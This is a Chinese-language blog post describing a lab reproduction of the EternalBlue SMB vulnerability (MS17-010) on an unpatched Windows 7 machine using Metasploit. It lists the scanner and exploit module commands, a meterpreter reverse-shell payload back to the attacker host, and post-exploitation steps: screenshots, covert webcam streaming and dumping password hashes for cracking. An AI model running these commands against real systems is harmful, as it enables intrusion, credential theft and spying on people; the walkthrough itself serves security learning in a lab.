CVE-2017-0143(永恒之蓝)漏洞复现By metasploit

一、永恒之蓝介绍

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。其中漏洞编号为MS17-010,利用多个SMB远程代码执行漏洞,可在无交互的情况下获取系统最高权限,又为远程代码任意执行。

二、metasploit工具介绍

metasploit 是一个开源框架,这个框架用来做渗透测试,其 msf 是由多个不同的模块组成的,在使用方面的话,可以在 kali 中直接使用,命令行 msfconsole 即可
模块介绍:辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。

Nmap --script=vuln    默认nse插件
Nmap vulscan vulners 调用第三方库探针
加入拓展扫描模块
https://cnblogs.com/shwang/p/12623669.html

三、实验环境

攻击机kali :192.168.93.132
靶机 win7:192.168.93.133(win7 需要关闭防火墙以及未打永恒之蓝补丁)

四、漏洞利用

1.先对靶机进行端口扫描

 发现445端口开放,可能存在MS017-010漏洞

2.启动msfconsole,搜索search ms17-010

 3.利用模块

搜索有关漏洞的模块,结果看到很多有关该漏洞的不同模块,可以使用auxiliary/scanner/smb/smb_ms17_010这个模块进行验证

> use auxiliary/scanner/smb/smb_ms17_010
>set rhost 192.168.93.133> set rport 445> show option
>exploit或者run

 

 发现永恒之蓝漏洞,开始调用漏洞利用模块按照以下参数来进行攻击

>use exploit/windows/smb/ms17_010_eternalblue
>set rhost 192.168.93.133 >set lhost 192.168.93.132 >set payload windows/x64/meterpreter/reverse_tcp > exploit

 反弹shell
>shell

>whoani

 1 .捕获桌面:

meterpreter screenshot

2 .监视器打开

meterpreter webcam_stream

kali会自动打开浏览器播放被攻击的电脑摄像头,被攻击的电脑摄像头也会变亮

3.获得用户密码
密码为hash加密值,可以利用在线解密进行破解
meterpreter > hashdump

 4.sysinfo查看系统信息

 

 


posted @ 2022-09-22 19:24  木易同学  阅读(928)  评论(1编辑  收藏  举报